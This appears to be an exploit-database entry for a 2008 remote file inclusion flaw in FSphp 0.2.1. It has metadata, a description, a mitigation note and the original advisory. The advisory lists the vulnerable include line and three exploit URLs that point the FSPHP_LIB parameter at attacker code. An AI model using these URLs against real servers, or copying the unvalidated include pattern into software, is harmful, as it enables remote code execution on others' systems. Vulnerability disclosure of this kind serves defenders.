header-logo
Suggest Exploit
vendor:
FSphp
by:
NoGe
7.5
CVSS
HIGH
Remote File Inclusion
98
CWE
Product Name: FSphp
Affected Version From: 2000.2.1
Affected Version To: 2000.2.1
Patch Exists: NO
Related CWE: N/A
CPE: a:fsphp:fsphp:0.2.1
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: None
2008

FSphp 0.2.1 Multiple Remote File Inclusion Vulnerability

FSphp 0.2.1 is vulnerable to multiple remote file inclusion vulnerability. An attacker can exploit this vulnerability by sending a malicious URL to the vulnerable application. The malicious URL contains the path of the malicious file which is hosted on a remote server. The vulnerable application includes the malicious file in the application and executes it.

Mitigation:

The application should not include any file from an untrusted source. The application should validate the input and filter out any malicious input.
Source

Exploit-DB raw data:

[o] FSphp 0.2.1 Multiple Remote File Inclusion Vulnerability
Software : FSphp version 0.2.1
Vendor   : http://fsphp.sourceforge.net/
Download : http://sourceforge.net/projects/fsphp/
Author   : NoGe
Home     : http://antisecurity.org/

[o] Vulnerable file
include_once $FSPHP_LIB . "/path.php" ;

lib/FSphp.php
lib/navigation.php
lib/pathwirte.php

[o] Exploit
http://localhost/[path]/lib/FSphp.php?FSPHP_LIB=[evilc0de]
http://localhost/[path]/lib/navigation.php?FSPHP_LIB=[evilc0de]
http://localhost/[path]/lib/pathwirte.php?FSPHP_LIB=[evilc0de]

Navigation

Suggest Exploit

Services By CQR